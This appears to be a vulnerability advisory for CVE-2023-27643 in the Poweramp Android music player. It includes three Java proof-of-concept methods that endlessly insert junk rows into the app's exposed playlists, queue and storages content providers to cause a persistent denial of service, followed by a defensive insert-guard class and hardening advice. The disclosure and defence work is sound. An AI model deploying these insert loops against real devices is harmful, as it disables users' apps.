Denial of Service in POWERAMP (CVE-2023-27643)

Vendor: POWERAMP (https://powerampapp.com/)

Affected product: Poweramp (com.maxmpz.audioplayer)

Version: build-954-uni

Download link: https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer

Description of the vulnerability for use in the CVE: An issue found in POWERAMP 925-bundle-play and Poweramp 954-uni allows a remote attacker to cause a denial of service via the Rescan button in Queue and Select Folders button in Library.

Additional information: Poweramp is a well-known music player for Android. When the user triggers certain actions, the app loads the relevant data stored in its database into memory. If a malicious app injects a large amount of data into the database, Poweramp crashes while loading it. Worse, users cannot fix the problem by simply restarting the application: Poweramp still fails to respond to any user request whenever one of those actions loads the database.

1. After a large amount of data is inserted into the database, the app takes too long to load and becomes unresponsive (for how long depends on the size of the injected data); the main page is in a DoS state during this time.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/playlists");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(5120);
            contentValues.put("playlist",randomString);
            contentValues.put("playlist_path",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

2. After a large amount of data is inserted into the database, when the user clicks the Rescan button in the Queue, the app reads the queue table from the database, resulting in a DoS.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/queue");
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("folder_file_id",1);
            contentResolver.insert(uri,contentValues);
        }
    }

3. After a large amount of data is inserted into the database, a persistent DoS is triggered when the user clicks the Select Folders button.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/storages");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(5120);
            contentValues.put("path",randomString);
            contentValues.put("path_hash",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

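
All three cases rely on another app being able to call `insert()` on the provider without restriction. The following is an added defensive example, not code from Poweramp or from the original report: a guard that a provider could call at the top of `ContentProvider.insert()`. The class name `InsertGuard`, the limits, and the way the table name is passed in are assumptions.

```java
import android.content.ContentValues;
import android.database.DatabaseUtils;
import android.database.sqlite.SQLiteDatabase;
import android.os.Binder;
import android.os.Process;

/**
 * Hypothetical guard for a ContentProvider's insert() path.
 * The first line of defence is still the manifest: declare the provider
 * with android:exported="false" (or a signature-level write permission)
 * so other apps cannot reach insert() at all.
 */
final class InsertGuard {
    // Assumed limits for illustration; tune them per table.
    static final int MAX_TEXT_LEN = 1024;
    static final long MAX_ROWS = 10_000;

    private InsertGuard() {}

    /**
     * @param table a name chosen by the provider's own UriMatcher,
     *              never a string taken from the caller's Uri
     */
    static void check(SQLiteDatabase db, String table, ContentValues values) {
        // 1. Accept writes only from the app's own UID. Inside a provider
        //    call, Binder.getCallingUid() is the UID of the calling process.
        int caller = Binder.getCallingUid();
        if (caller != Process.myUid()) {
            throw new SecurityException("insert denied for uid " + caller);
        }
        // 2. Reject oversized text columns (the PoCs insert 5120-char strings).
        for (String key : values.keySet()) {
            Object v = values.get(key);
            if (v instanceof String && ((String) v).length() > MAX_TEXT_LEN) {
                throw new IllegalArgumentException(
                        key + " exceeds " + MAX_TEXT_LEN + " characters");
            }
        }
        // 3. Cap table growth so an insert loop cannot inflate what the
        //    UI later has to load.
        if (DatabaseUtils.queryNumEntries(db, table) >= MAX_ROWS) {
            throw new IllegalStateException(table + " has reached its row limit");
        }
    }
}
```

Independently of the guard, loading these tables off the main thread and in pages keeps a large table from freezing the UI.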